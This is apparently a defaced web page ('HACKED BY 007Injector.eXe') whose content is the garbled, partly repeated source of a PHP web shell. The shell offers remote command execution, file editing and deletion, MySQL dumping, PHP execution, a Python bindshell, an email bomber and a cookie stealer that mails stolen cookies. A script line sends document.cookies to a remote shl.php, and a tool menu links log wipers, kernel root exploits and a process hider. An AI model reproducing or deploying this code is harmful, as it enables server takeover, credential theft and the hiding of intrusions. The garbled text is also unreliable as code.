"); echo(""); @unlink('lookup.py'); } function bshell(){ // Python bindshell script style(); if(!@$_POST['bport']){ ?>
Port:
"R0lGODlhEwAQALMAAAAAAP///5ycAM7OY///nP//zv/OnPf39////wAAAAAAAAAAAAAAAAAAAAAAAAAAACH5BAEAAA" . "gALAAAAAATABAAAARREMlJq7046yp6BxsiHEVBEAKYCUPrDp7HlXRdEoMqCebp/4YchffzGQhH4YRYPB2DOlHPiKwq" . "d1Pq8yrVVg3QYeH5RYK5rJfaFUUA3vB4fBIBADs=", "image"=>"R0lGODlhFAAWAOMAAP////8zM8z//8zMzJmZmWZmZmYAADMzMwCZzACZMwAzZgAAAAAAAAAAAAAAAAAAACH+TlRoaX" . "MgYXJ0IGlzIGluIHRoZSBwdWJsaWMgZG9tYWluLiBLZXZpbiBIdWdoZXMsIGtldmluaEBlaXQuY29tLCBTZXB0ZW1i" . "ZXIgMTk5NQAh+QQBAAACACwAAAAAFAAWAAAEkPDISae4WBzAu99Hdm1eSYYZWXYqOgJBLAcDoNrYNssGsBy/4GsX6y" . "2OyMWQ2OMQngSlBjZLWBM1AFSqkyU4A2tWywUMYt/wlTSIvgYGA/Zq3QwU7mmHvh4g8GUsfAUHCH95NwMHV4SGh4Ed" . "ihOOjy8rZpSVeiV+mYCWHncKo6Sfm5cliAdQrK1PQBlJsrNSEQA7", "unknown"=>"R0lGODlhFAAWAMIAAP///8z//5mZmTMzMwAAAAAAAAAAAAAAACH+TlRoaXMgYXJ0IGlzIGluIHRoZSBwdWJsaWMgZG" . "9tYWluLiBLZXZpbiBIdWdoZXMsIGtldmluaEBlaXQuY29tLCBTZXB0ZW1iZXIgMTk5NQAh+QQBAAABACwAAAAAFAAW" . "AAADaDi6vPEwDECrnSO+aTvPEQcIAmGaIrhR5XmKgMq1LkoMN7ECrjDWp52r0iPpJJ0KjUAq7SxLE+sI+9V8vycFiM" . "0iLb2O80s8JcfVJJTaGYrZYPNby5Ov6WolPD+XDJqAgSQ4EUCGQQEJADs=", "binary"=>"R0lGODlhFAAWAMIAAP///8z//8zMzJmZmTMzMwAAAAAAAAAAACH+TlRoaXMgYXJ0IGlzIGluIHRoZSBwdWJsaWMgZG" . "9tYWluLiBLZXZpbiBIdWdoZXMsIGtldmluaEBlaXQuY29tLCBTZXB0ZW1iZXIgMTk5NQAh+QQBAAABACwAAAAAFAAW" . "AAADaUi6vPEwEECrnSS+WQoQXSEAE6lxXgeopQmha+q1rhTfakHo/HaDnVFo6LMYKYPkoOADim4VJdOWkx2XvirUgq" . "VaVcbuxCn0hKe04znrIV/ROOvaG3+z63OYO6/uiwlKgYJJOxFDh4hTCQA7", "text"=>"R0lGODlhFAAWAOMAAP/////MM/8zM8z//5mZmZlmM2bM/zMzMwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACH+TlRoaX" . "MgYXJ0IGlzIGluIHRoZSBwdWJsaWMgZG9tYWluLiBLZXZpbiBIdWdoZXMsIGtldmluaEBlaXQuY29tLCBTZXB0ZW1i" . "ZXIgMTk5NQAh+QQBAAADACwAAAAAFAAWAAAEb/DISee4eBzAu99Hdm1eSYbZWXEkgI5sEBg0+2HnTBsccvhAmGtXAy" . "COSITwUGg2PYQoQalhOZ/QKLVV6gKmQm8XXDUmzx0yV5ze9s7JdpgtL3ME5jhHTS/xO3hwdWt0f317WwdSi4xRPxlw" . "kUgXEQA7", "compressed"=>"R0lGODlhFAAWAOcAAP//////zP//mf//Zv//M///AP/M///MzP/Mmf/MZv/MM//MAP+Z//+ZzP+Zmf+ZZv+ZM/+ZAP" . "9m//9mzP9mmf9mZv9mM/9mAP8z//8zzP8zmf8zZv8zM/8zAP8A//8AzP8Amf8AZv8AM/8AAMz//8z/zMz/mcz/Zsz/" . "M8z/AMzM/8zMzMzMmczMZszMM8zMAMyZ/8yZzMyZmcyZZsyZM8yZAMxm/8xmzMxmmcxmZsxmM8xmAMwz/8wzzMwzmc" . "wzZswzM8wzAMwA/8wAzMwAmcwAZswAM8wAAJn//5n/zJn/mZn/Zpn/M5n/AJnM/5nMzJnMmZnMZpnMM5nMAJmZ/5mZ" . "zJmZmZmZZpmZM5mZAJlm/5lmzJlmmZlmZplmM5lmAJkz/5kzzJkzmZkzZpkzM5kzAJkA/5kAzJkAmZkAZpkAM5kAAG" . "b//2b/zGb/mWb/Zmb/M2b/AGbM/2bMzGbMmWbMZmbMM2bMAGaZ/2aZzGaZmWaZZmaZM2aZAGZm/2ZmzGZmmWZmZmZm" . "M2ZmAGYz/2YzzGYzmWYzZmYzM2YzAGYA/2YAzGYAmWYAZmYAM2YAADP//zP/zDP/mTP/ZjP/MzP/ADPM/zPMzDPMmT" . "PMZjPMMzPMADOZ/zOZzDOZmTOZZjOZMzOZADNm/zNmzDNmmTNmZjNmMzNmADMz/zMzzDMzmTMzZjMzMzMzADMA/zMA" . "zDMAmTMAZjMAMzMAAAD//wD/zAD/mQD/ZgD/MwD/AADM/wDMzADMmQDMZgDMMwDMAACZ/wCZzACZmQCZZgCZMwCZAA" . "Bm/wBmzABmmQBmZgBmMwBmAAAz/wAzzAAzmQAzZgAzMwAzAAAA/wAAzAAAmQAAZgAAM+4AAN0AALsAAKoAAIgAAHcA" . "AFUAAEQAACIAABEAAADuAADdAAC7AACqAACIAAB3AABVAABEAAAiAAARAAAA7gAA3QAAuwAAqgAAiAAAdwAAVQAARA" . "AAIgAAEe7u7t3d3bu7u6qqqoiIiHd3d1VVVURERCIiIhEREQAAACH+TlRoaXMgYXJ0IGlzIGluIHRoZSBwdWJsaWMg" . "ZG9tYWluLiBLZXZpbiBIdWdoZXMsIGtldmluaEBlaXQuY29tLCBTZXB0ZW1iZXIgMTk5NQAh+QQBAAAkACwAAAAAFA" . "AWAAAImQBJCCTBqmDBgQgTDmQFAABDVgojEmzI0KHEhBUrWrwoMGNDihwnAvjHiqRJjhX/qVz5D+VHAFZiWmmZ8BGH" . "ji9hxqTJ4ZFAmzc1vpxJgkPPn0Y5CP04M6lPEkCN5mxoJelRqFY5TM36NGrPqV67Op0KM6rYnkup/gMq1mdamC1tdn" . "36lijUpwjr0pSoFyUrmTJLhiTBkqXCgAA7", "sound"=>"R0lGODlhFAAWAMIAAP////8zM8z//8zMzJmZmWYAADMzMwAAACH+TlRoaXMgYXJ0IGlzIGluIHRoZSBwdWJsaWMgZG" . "9tYWluLiBLZXZpbiBIdWdoZXMsIGtldmluaEBlaXQuY29tLCBTZXB0ZW1iZXIgMTk5NQAh+QQBAAACACwAAAAAFAAW" . "AAADayi63P4wNsNCkOocYVWPB7FxFwmFwGh+DZpynndpNAHcW9cVQUj8tttrd+G5hMINT7A0BpE4ZnF6hCqn0iryKs" . "0SDN9v0tSc0Q4DQ1SHFRjeBrQ6FzNN5Co2JD4YfUp7GnYsexQLhBiJigsJADs=", "script"=>"R0lGODlhFAAWAMIAAP///8z//5mZmTMzMwAAAAAAAAAAAAAAACH+TlRoaXMgYXJ0IGlzIGluIHRoZSBwdWJsaWMgZG" . "9tYWluLiBLZXZpbiBIdWdoZXMsIGtldmluaEBlaXQuY29tLCBTZXB0ZW1iZXIgMTk5NQAh+QQBAAABACwAAAAAFAAW" . "AAADZTi6vPEwDECrnSO+aTvPEddVIrhVBJCSF8QRMIwOBE2fVLrmcYz3O4pgKCDgVMgR0SgZOYVM0dNS/AF7gGy1me" . "16v9vXNdYNf89es2os00bRcDW7DVDDwe87fjMg+v9DNxBzYw8JADs="); header("Content-type: image/gif"); echo(base64_decode($images[$img])); die(); } function kill(){ // Shell deleter function style(); echo("
"); echo("Type 'confirm' to kill the shell:
n"); echo(""); echo("
"); if(@$_POST['ver'] == "confirm"){ $self = basename($_SERVER['PHP_SELF']); if(unlink($self)) echo("Deleted"); else echo("Failed"); } } die(); ?> "> Moad HN Was Here
             
 
  Site Navigation  
   
  Home  
     
   
     
     
   
  HACKED BY 007Injector.eXe  
  document.location.href= ##'http://site.com/shl.php?cookie='+document.cookies ## ##In the AJAX command shell, type 'home' to return to the shell's ##directory. Type 'clear' to clear the output screen. ###########################VERIFICATION LEVELS##########################0: No protection; anyone can access ##1: User-Agent required ##2: Require IP ##3: Basic Authentication ###############################KNOWN BUGS###############################The SQL tool is NOT complete. There is currently no editing function##available. Some time in the future this may be fixed, but for now ##don't complain to me about it #################################SHOUTS#################################pr0be - Beta testing & CSS ##TrinTiTTY - Beta testing ##clorox - Beta testing ##Everyone else at g00ns.net #########################NOTE TO ADMINISTRATORS#########################If this script has been found on your server without your approval, ##it would probably be wise to delete it and check your logs. #######################################################################*/// Configuration$auth = 0;$uakey = "b5c3d0b28619de70bf5588505f4061f2"; // MD5 encoded user-agent$IP = array("127.0.0.2","127.0.0.1"); // IP Addresses allowed to access shell$email = ""; // E-mail address where cookies will be sent$user = "le0n"; // MD5 encoded User$pass = "mr.le.0n"; // MD5 encoded Password// Global Variables$version = '1.4 beta';$self = $_SERVER['PHP_SELF'];$soft = $_SERVER['SERVER_SOFTWARE'];$servinf = split('[:]', $_SERVER['HTTP_HOST']);$servip = $servinf[0];$servport = @$servinf[1] ? $servinf[1] : '80';$cmd = @$_GET['cmd'];$act = @$_GET['act'];$cmd = @$_GET['cmd'];$curdir = cleandir(getcwd());if(@$_GET['dir']){ $dir = $_GET['dir']; if($dir != 'nullz') $dir = cleandir($dir);}$contents = @$_POST['contents'];$gf = @$_POST['gf'];$img = @$_GET['img'];// Credits to disruptiv for this bit ;)if(count(get_included_files()) > 1 || count(get_included_files()) > 1) list($me) = explode("&", $_SERVER['REQUEST_URI']);else $me = $PHP_SELF . "?";@session_start();@set_time_limit(5);switch($auth){ // Authentication switcher case 1: if(md5($_SERVER['HTTP_USER_AGENT']) != $uakey) hide(); break; case 2: if(!in_array($_SERVER['REMOTE_ADDR'],$IP)) hide(); break; case 3: if(!$_SERVER['PHP_AUTH_USER']) userauth(); break; default: break;}function cleandir($d){ // Function to clean up the $dir and $curdir variables $d = realpath($d); $d = str_replace("\\", "\", $d); $d = str_replace("////", "//", $d); return($d);}function userauth(){ // Basic authentication function global $user, $pass; header("WWW-Authenticate: Basic realm='Secure Area'"); if(md5($_SERVER['PHP_AUTH_USER']) != $user || md5($_SERVER['PHP_AUTH_PW'] != $pass)) hide();}function get_exec_function(){ // Command execution method finder $exec_functions = array("popen", "exec", "shell_exec", "system", "passthru"); $disabled_funcs = ini_get('disable_functions'); foreach($exec_functions as $f) if(strpos($disabled_funcs, $f) === false) return $f;}function execute_command($exec_function, $command){ // Command execution function switch($exec_function){ case "popen": $h = popen($command, "r"); while(!feof($h)) echo(fgets($h)); break; case "exec": exec($command, $result); foreach($result as $r) echo($r . "n"); break; case "shell_exec": echo(shell_exec($command)); break; case "system": system($command); break; case "passthru": passthru($command); break; }}if(!$act && !$cmd && !@$_GET['cookie'] && !@$_GET['f'] && !@$dir && !$gf && !$img && !@$_GET['ajxcmd']) main();elseif(!$act && $cmd){ // Raw command execution style(); echo("Results:n
"); echo("");}elseif(@$_GET['ajxcmd']){ // Command execution for AJAX shell if($_GET['ajxcmd'] == "home") $_SESSION['work_dir'] = getcwd(); elseif($exec_function = get_exec_function()){ if(strpos($_GET['ajxcmd'], 'cd') === 0){ $c = array_pop(explode(" ", $_GET['ajxcmd'])); if(@is_dir($_SESSION['work_dir'] . DIRECTORY_SEPARATOR . $c) && $c[0] != '\' && $c[0] != '//') $_SESSION['work_dir'] .= DIRECTORY_SEPARATOR . $c; elseif(@is_dir($c) && $c[0] != '.') $_SESSION['work_dir'] = $c; else echo("Invalid directoryn"); } else{ @chdir($_SESSION['work_dir']); execute_command($exec_function, $_GET['ajxcmd']); } } else die("All execution methods disabled.");}elseif(@$_GET['cookie']){@mail($email, "Cookie Data", @$_GET['cookie'], "From: $email"); hide();} // Cookie stealer functionelseif($act == 'view' && @$_GET['f'] && $dir) view($_GET['f'], $dir);elseif($img) img($img);elseif($gf) grab($gf);elseif(@$dir) files($dir);else{ switch($act){ case 'phpinfo': phpinfo();break; case 'sql': sql();break; case 'files': files(@$dir);break; case 'email': email();break; case 'cmd': cmd();break; case 'upload': upload();break; case 'tools': tools();break; case 'sqllogin': sqllogin();break; case 'sql': sql();break; case 'lookup': lookup();break; case 'kill': kill();break; case 'phpexec': execphp();break; case 'bshell': bshell();break; default: main();break; }}function hide(){ // Hiding function global $self, $soft, $servip, $servport; header("HTTP/1.0 404 Not Found");?>404 Not Found

Not Found

The requested URL was not found on this server.

 

Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.


G-H WWW.HACKER.PS shell v.<?php echo($version . "-" . $servip); ?>'Command Execute','files'=>'File View','phpinfo'=>'PHP info', 'phpexec'=>'PHP Execute', 'tools'=>'Tools','sqllogin'=>'SQL','upload'=>'Get Files','kill'=>'Kill Shell'); $capt = array_flip($act); echo("
n"); echo("Host: $servip
n"); echo("Server software: $soft
n"); echo("Uname: " . php_uname() . "
n"); echo("Shell Directory: " . getcwd() . "
n"); echo(" MoreLess

Links

" . $link . " ] "); ?>


:: G-H WWW.HACKER.PS shell v ::

Execute PHP Code"); echo(""); echo(" n
n"); echo(" "); echo("
"); if(@$_POST['phpexec']){ echo(""); }}function sqllogin(){ // MySQL login function global $me; if(@$_SESSION['isloggedin'] == "true") header("Location: " . $me . "&act=sql"); if(@$_POST['un'] && @$_POST['pw']) header("Location: " . $me . "&act=sql"); style(); ?>
User:

Password:

Host:

Port:

n"); die(sqllogin()); } else $_SESSION['isloggedin'] = "true"; } else die(sqllogin()); if (@$_GET['db']){ mysql_select_db($_GET['db'], $sqlcon); if(@$_GET['sqlquery']){ $dat = mysql_query($_GET['sqlquery'], $sqlcon) or die(mysql_error()); $num = mysql_num_rows($dat); for($i=0;$i<$num;$i++) echo(mysql_result($dat, $i) . "
n"); } else if(@$_GET['table'] && !@$_GET['sqlf']){ echo("Insert Row

n"); echo(""); $query = "SHOW COLUMNS FROM " . $_GET['table']; $result = mysql_query($query, $sqlcon) or die(mysql_error()); $i = 0; $fields = array(); while($row = mysql_fetch_assoc($result)){ array_push($fields, $row['Field']); echo(""); for($i=0;$i" . $row[0] . ""); } echo("n"); } } $y++; } echo("
" . $fields[$i]); $i++; } $result = mysql_query("SELECT * FROM " . $_GET['table'], $sqlcon) or die(mysql_error()); $num_rows = mysql_num_rows($result) or die(mysql_error()); $y=0; for($x=1;$x<=$num_rows+1;$x++){ if(!@$_GET['p']) $_GET['p'] = 1; if(@$_GET['p']){ if($y > (30*($_GET['p']-1)) && $y <= 30*($_GET['p'])){ echo("
n"); for($z=1;$z<=ceil($num_rows / 30);$z++){ echo("" . $z . " | "); } } elseif(@$_GET['table'] && @$_GET['sqlf']){ switch($_GET['sqlf']){ case "dl": sqldownload();break; case "ins": sqlinsert();break; default: $_GET['sqlf'] = ""; } } else{ echo(""); $query = "SHOW TABLES FROM " . $_GET['db']; $dat = mysql_query($query, $sqlcon) or die(mysql_error()); while ($row = mysql_fetch_row($dat)) echo("n"); echo("
" . $row[0] . "[Download]
"); } } else{ $dbs=mysql_list_dbs($sqlcon); while($row = mysql_fetch_object($dbs)) echo("Database . "">" . $row->Database . "
n"); } mysql_close($sqlcon);}function sqldownload(){ // Download sql file function $sqlcon = @mysql_connect($_SESSION['sql_host'] . ':' . $_SESSION['sql_port'], $_SESSION['sql_user'], $_SESSION['sql_password']); mysql_select_db($_GET['db'], $sqlcon); $query = "SHOW COLUMNS FROM " . $_GET['table']; $result = mysql_query($query, $sqlcon) or die(mysql_error()); $fields = array(); while($row = mysql_fetch_assoc($result)){ array_push($fields, $row['Field']); $i++; } $result = mysql_query("SELECT * FROM " . $_GET['table'], $sqlcon) or die(mysql_error()); $num_rows = mysql_num_rows($result) or die(mysql_error()); for($x=1;$x<$num_rows;$x++){ $out .= "("; for($i=0;$inGo back"); } $query = "SHOW COLUMNS FROM " . @$_GET['table']; $result = mysql_query($query, $sqlcon) or die("MYSQL ERROR: " . mysql_error()); $i = 0; $fields = array(); echo("
"); echo(""); while($row = mysql_fetch_assoc($result)){ array_push($fields, $row['Field']); echo("
" . $fields[$i] . "
n"); $i++; } echo("
"); echo("
n "); echo("
");}function nicesize($size){ if(!$size) return "0 B"; if ($size >= 1073741824) return(round($size / 1073741824) . " GB"); elseif ($size >= 1048576) return(round($size / 1048576) . " MB"); elseif ($size >= 1024) return(round($size / 1024) . " KB"); else return($size . " B");}function files($dir){ // File manipulator function global $me, $self, $curdir; style(); if($dir=="") $dir = $curdir; $dirx = explode(DIRECTORY_SEPARATOR, $dir); $files = array(); $folders = array(); echo("
"); echo(" "); echo(" "); echo("
"); echo("

File list for "); for($i=0;$i $dirx[$i]" . DIRECTORY_SEPARATOR); } echo("

"); echo(""); echo(""); if ($handle = opendir($dir)) { while (false != ($link = readdir($handle))) { if (@is_dir($dir . DIRECTORY_SEPARATOR . $link)){ $file = array(); $color = @is_writable($dir . DIRECTORY_SEPARATOR . $link) ? "forestgreen" : (is_readable($dir . DIRECTORY_SEPARATOR . $link) ? "gold" : "red"); @$file['link'] = "$link"; @$file['icon'] = "folder"; $folder = " ". $file['link']; array_push($folders, $folder); } else{ $file = array(); $ext = strpos($link, ".") ? strtolower(end(explode(".", $link))) : ""; $file['size'] = nicesize(@filesize($dir . DIRECTORY_SEPARATOR . $link)); $color = @is_writable($dir . DIRECTORY_SEPARATOR . $link) ? "forestgreen" : (is_readable($dir . DIRECTORY_SEPARATOR . $link) ? "gold" : "red"); @$file['link'] = "$link"; switch($ext){ case 'exe': case 'com': case 'jar': case '': $file['icon']='binary'; break; case 'jpg': case 'gif': case 'png': case 'bmp': $file['icon']='image'; break; case 'zip': case 'tar': case 'rar': case 'gz': case 'cab': case 'bz2': case 'gzip': $file['icon']='compressed'; break; case 'txt': case 'doc': case 'pdf': case 'htm': case 'html': case 'rtf': $file['icon']='text'; break; case 'wav': case 'mp3': case 'mp4': case 'wma': $file['icon']='sound'; break; case 'js': case 'vbs': case 'c': case 'h': case 'sh': case 'pl': case 'py': case 'php': case 'h': $file['icon']='script'; break; default: $file['icon'] = 'unknown'; break; } $file = "n"; array_push($files, $file); } } foreach($folders as $folder) echo("n"); foreach($files as $file) echo($file); echo("
File NameFile Size
". $file['link'] . "" . $file['size'] . "
$folderDIR
"); closedir($handle); }}function email(){ // Email bomber function global $me; style();?>
">Your address:

Their address:

Subject:

Text:

How many times:



"); echo("Go back"); die(); } elseif(@$_POST['fileact'] == "Delete"){ unlink($filename); echo("Deleted file.

"); echo("Go back"); die(); } if($dir != "nullz") $filename = $dir . DIRECTORY_SEPARATOR . $filename; // heh $file = @fopen($filename, 'r'); $content = @fread($file, @filesize($filename)); echo("
"); echo("
Output Directory


Remote Upload


Local File Upload

"1", "Vanish2.tgz"=>"http://packetstormsecurity.org/UNIX/penetration/log-wipers/vanish2.tgz", "Cloak.c"=>"http://packetstormsecurity.org/UNIX/penetration/log-wipers/cloak.c", "gh0st.sh"=>"http://packetstormsecurity.org/UNIX/penetration/log-wipers/gh0st.sh", "--- Priv Escalation ---"=>"2", "h00lyshit - Linux 2.6 ALL"=>"http://someshit.net/files/xpl/h00lyshit", "k-rad3 - Linux <= 2.6.11"=>"http://someshit.net/files/xpl/krad3", "raptor - Linux <= 2.6.17.4"=>"http://someshit.net/files/xpl/raptor", "rootbsd - BSD v?"=>"http://someshit.net/files/xpl/rootbsd", "--- Bindshells ---"=>"3", "THC rwwwshell-1.6.perl"=>"http://packetstormsecurity.org/groups/thc/rwwwshell-1.6.perl", "Basic Perl bindshell"=>"http://packetstormsecurity.org/groups/synnergy/bindshell-unix", "--- Misc ---"=>"4", "MOCKS SOCKS4 Proxy"=>"http://superb-east.dl.sourceforge.net/sourceforge/mocks/mocks-0.0.2.tar.gz", "xps.c (proc hider)"=>"http://packetstormsecurity.org/groups/shadowpenguin/unix-tools/xps.c"); $names = array_flip($tools); echo("
"); echo("Output Directory
"); echo("

"); echo(" "); echo("
"); echo("
"); echo("
"); echo("Bindshell (requires writable directory)
n"); echo("List domains (requires writable directory)
n"); echo("E-mail bomber
n");}function lookup(){ // Domain lookup function global $servinf; style(); $script = "import urllib, urllib2, sys, re req = urllib2.Request('http://www.seologs.com/ip-domains.html', urllib.urlencode({'domainname' : sys.argv[1]})) site = re.findall('.+) (.+)
', urllib2.urlopen(req).read()) for i in xrange(0,len(site)): print site[i]"; // My sexy python script $handle = fopen('lookup.py', 'w'); @fwrite($handle, $script); @fclose($handle); echo("

Domains

"); echo("
    "); $cmd = exec("python lookup.py $servinf[0]", $ret); foreach($ret as $site) echo("
  • $siten"); echo("
"); @unlink('lookup.py');}function bshell(){ // Python bindshell script style(); if(!@$_POST['bport']){ ?>
Port:
"R0lGODlhEwAQALMAAAAAAP///5ycAM7OY///nP//zv/OnPf39////wAAAAAAAAAAAAAAAAAAAAAAAAAAACH5BAEAAA" . "gALAAAAAATABAAAARREMlJq7046yp6BxsiHEVBEAKYCUPrDp7HlXRdEoMqCebp/4YchffzGQhH4YRYPB2DOlHPiKwq" . "d1Pq8yrVVg3QYeH5RYK5rJfaFUUA3vB4fBIBADs=", "image"=>"R0lGODlhFAAWAOMAAP////8zM8z//8zMzJmZmWZmZmYAADMzMwCZzACZMwAzZgAAAAAAAAAAAAAAAAAAACH+TlRoaX" . "MgYXJ0IGlzIGluIHRoZSBwdWJsaWMgZG9tYWluLiBLZXZpbiBIdWdoZXMsIGtldmluaEBlaXQuY29tLCBTZXB0ZW1i" . "ZXIgMTk5NQAh+QQBAAACACwAAAAAFAAWAAAEkPDISae4WBzAu99Hdm1eSYYZWXYqOgJBLAcDoNrYNssGsBy/4GsX6y" . "2OyMWQ2OMQngSlBjZLWBM1AFSqkyU4A2tWywUMYt/wlTSIvgYGA/Zq3QwU7mmHvh4g8GUsfAUHCH95NwMHV4SGh4Ed" . "ihOOjy8rZpSVeiV+mYCWHncKo6Sfm5cliAdQrK1PQBlJsrNSEQA7", "unknown"=>"R0lGODlhFAAWAMIAAP///8z//5mZmTMzMwAAAAAAAAAAAAAAACH+TlRoaXMgYXJ0IGlzIGluIHRoZSBwdWJsaWMgZG" . "9tYWluLiBLZXZpbiBIdWdoZXMsIGtldmluaEBlaXQuY29tLCBTZXB0ZW1iZXIgMTk5NQAh+QQBAAABACwAAAAAFAAW" . "AAADaDi6vPEwDECrnSO+aTvPEQcIAmGaIrhR5XmKgMq1LkoMN7ECrjDWp52r0iPpJJ0KjUAq7SxLE+sI+9V8vycFiM" . "0iLb2O80s8JcfVJJTaGYrZYPNby5Ov6WolPD+XDJqAgSQ4EUCGQQEJADs=", "binary"=>"R0lGODlhFAAWAMIAAP///8z//8zMzJmZmTMzMwAAAAAAAAAAACH+TlRoaXMgYXJ0IGlzIGluIHRoZSBwdWJsaWMgZG" . "9tYWluLiBLZXZpbiBIdWdoZXMsIGtldmluaEBlaXQuY29tLCBTZXB0ZW1iZXIgMTk5NQAh+QQBAAABACwAAAAAFAAW" . "AAADaUi6vPEwEECrnSS+WQoQXSEAE6lxXgeopQmha+q1rhTfakHo/HaDnVFo6LMYKYPkoOADim4VJdOWkx2XvirUgq" . "VaVcbuxCn0hKe04znrIV/ROOvaG3+z63OYO6/uiwlKgYJJOxFDh4hTCQA7", "text"=>"R0lGODlhFAAWAOMAAP/////MM/8zM8z//5mZmZlmM2bM/zMzMwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACH+TlRoaX" . "MgYXJ0IGlzIGluIHRoZSBwdWJsaWMgZG9tYWluLiBLZXZpbiBIdWdoZXMsIGtldmluaEBlaXQuY29tLCBTZXB0ZW1i" . "ZXIgMTk5NQAh+QQBAAADACwAAAAAFAAWAAAEb/DISee4eBzAu99Hdm1eSYbZWXEkgI5sEBg0+2HnTBsccvhAmGtXAy" . "COSITwUGg2PYQoQalhOZ/QKLVV6gKmQm8XXDUmzx0yV5ze9s7JdpgtL3ME5jhHTS/xO3hwdWt0f317WwdSi4xRPxlw" . "kUgXEQA7", "compressed"=>"R0lGODlhFAAWAOcAAP//////zP//mf//Zv//M///AP/M///MzP/Mmf/MZv/MM//MAP+Z//+ZzP+Zmf+ZZv+ZM/+ZAP" . "9m//9mzP9mmf9mZv9mM/9mAP8z//8zzP8zmf8zZv8zM/8zAP8A//8AzP8Amf8AZv8AM/8AAMz//8z/zMz/mcz/Zsz/" . "M8z/AMzM/8zMzMzMmczMZszMM8zMAMyZ/8yZzMyZmcyZZsyZM8yZAMxm/8xmzMxmmcxmZsxmM8xmAMwz/8wzzMwzmc" . "wzZswzM8wzAMwA/8wAzMwAmcwAZswAM8wAAJn//5n/zJn/mZn/Zpn/M5n/AJnM/5nMzJnMmZnMZpnMM5nMAJmZ/5mZ" . "zJmZmZmZZpmZM5mZAJlm/5lmzJlmmZlmZplmM5lmAJkz/5kzzJkzmZkzZpkzM5kzAJkA/5kAzJkAmZkAZpkAM5kAAG" . "b//2b/zGb/mWb/Zmb/M2b/AGbM/2bMzGbMmWbMZmbMM2bMAGaZ/2aZzGaZmWaZZmaZM2aZAGZm/2ZmzGZmmWZmZmZm" . "M2ZmAGYz/2YzzGYzmWYzZmYzM2YzAGYA/2YAzGYAmWYAZmYAM2YAADP//zP/zDP/mTP/ZjP/MzP/ADPM/zPMzDPMmT" . "PMZjPMMzPMADOZ/zOZzDOZmTOZZjOZMzOZADNm/zNmzDNmmTNmZjNmMzNmADMz/zMzzDMzmTMzZjMzMzMzADMA/zMA" . "zDMAmTMAZjMAMzMAAAD//wD/zAD/mQD/ZgD/MwD/AADM/wDMzADMmQDMZgDMMwDMAACZ/wCZzACZmQCZZgCZMwCZAA" . "Bm/wBmzABmmQBmZgBmMwBmAAAz/wAzzAAzmQAzZgAzMwAzAAAA/wAAzAAAmQAAZgAAM+4AAN0AALsAAKoAAIgAAHcA" . "AFUAAEQAACIAABEAAADuAADdAAC7AACqAACIAAB3AABVAABEAAAiAAARAAAA7gAA3QAAuwAAqgAAiAAAdwAAVQAARA" . "AAIgAAEe7u7t3d3bu7u6qqqoiIiHd3d1VVVURERCIiIhEREQAAACH+TlRoaXMgYXJ0IGlzIGluIHRoZSBwdWJsaWMg" . "ZG9tYWluLiBLZXZpbiBIdWdoZXMsIGtldmluaEBlaXQuY29tLCBTZXB0ZW1iZXIgMTk5NQAh+QQBAAAkACwAAAAAFA" . "AWAAAImQBJCCTBqmDBgQgTDmQFAABDVgojEmzI0KHEhBUrWrwoMGNDihwnAvjHiqRJjhX/qVz5D+VHAFZiWmmZ8BGH" . "ji9hxqTJ4ZFAmzc1vpxJgkPPn0Y5CP04M6lPEkCN5mxoJelRqFY5TM36NGrPqV67Op0KM6rYnkup/gMq1mdamC1tdn" . "36lijUpwjr0pSoFyUrmTJLhiTBkqXCgAA7", "sound"=>"R0lGODlhFAAWAMIAAP////8zM8z//8zMzJmZmWYAADMzMwAAACH+TlRoaXMgYXJ0IGlzIGluIHRoZSBwdWJsaWMgZG" . "9tYWluLiBLZXZpbiBIdWdoZXMsIGtldmluaEBlaXQuY29tLCBTZXB0ZW1iZXIgMTk5NQAh+QQBAAACACwAAAAAFAAW" . "AAADayi63P4wNsNCkOocYVWPB7FxFwmFwGh+DZpynndpNAHcW9cVQUj8tttrd+G5hMINT7A0BpE4ZnF6hCqn0iryKs" . "0SDN9v0tSc0Q4DQ1SHFRjeBrQ6FzNN5Co2JD4YfUp7GnYsexQLhBiJigsJADs=", "script"=>"R0lGODlhFAAWAMIAAP///8z//5mZmTMzMwAAAAAAAAAAAAAAACH+TlRoaXMgYXJ0IGlzIGluIHRoZSBwdWJsaWMgZG" . "9tYWluLiBLZXZpbiBIdWdoZXMsIGtldmluaEBlaXQuY29tLCBTZXB0ZW1iZXIgMTk5NQAh+QQBAAABACwAAAAAFAAW" . "AAADZTi6vPEwDECrnSO+aTvPEddVIrhVBJCSF8QRMIwOBE2fVLrmcYz3O4pgKCDgVMgR0SgZOYVM0dNS/AF7gGy1me" . "16v9vXNdYNf89es2os00bRcDW7DVDDwe87fjMg+v9DNxBzYw8JADs="); header("Content-type: image/gif"); echo(base64_decode($images[$img])); die();}function kill(){ // Shell deleter function style(); echo("
"); echo("Type 'confirm' to kill the shell:
n "); echo(" "); echo("
"); if(@$_POST['ver'] == "confirm"){ $self = basename($_SERVER['PHP_SELF']); if(unlink($self)) echo("Deleted"); else echo("Failed"); }}die();?>


Name:
Email:

 
     
 
           
document.location.href= # #'http://site.com/shl.php?cookie='+document.cookies # # # #In the AJAX command shell, type 'home' to return to the shell's # #directory. Type 'clear' to clear the output screen. # ##########################VERIFICATION LEVELS######################### #0: No protection; anyone can access # #1: User-Agent required # #2: Require IP # #3: Basic Authentication # ##############################KNOWN BUGS############################## #The SQL tool is NOT complete. There is currently no editing function# #available. Some time in the future this may be fixed, but for now # #don't complain to me about it # ################################SHOUTS################################ #pr0be - Beta testing & CSS # #TrinTiTTY - Beta testing # #clorox - Beta testing # #Everyone else at g00ns.net # ########################NOTE TO ADMINISTRATORS######################## #If this script has been found on your server without your approval, # #it would probably be wise to delete it and check your logs. # ###################################################################### */ // Configuration $auth = 0; $uakey = "b5c3d0b28619de70bf5588505f4061f2"; // MD5 encoded user-agent $IP = array("127.0.0.2","127.0.0.1"); // IP Addresses allowed to access shell $email = ""; // E-mail address where cookies will be sent $user = "le0n"; // MD5 encoded User $pass = "mr.le.0n"; // MD5 encoded Password // Global Variables $version = '1.4 beta'; $self = $_SERVER['PHP_SELF']; $soft = $_SERVER['SERVER_SOFTWARE']; $servinf = split('[:]', $_SERVER['HTTP_HOST']); $servip = $servinf[0]; $servport = @$servinf[1] ? $servinf[1] : '80'; $cmd = @$_GET['cmd']; $act = @$_GET['act']; $cmd = @$_GET['cmd']; $curdir = cleandir(getcwd()); if(@$_GET['dir']){ $dir = $_GET['dir']; if($dir != 'nullz') $dir 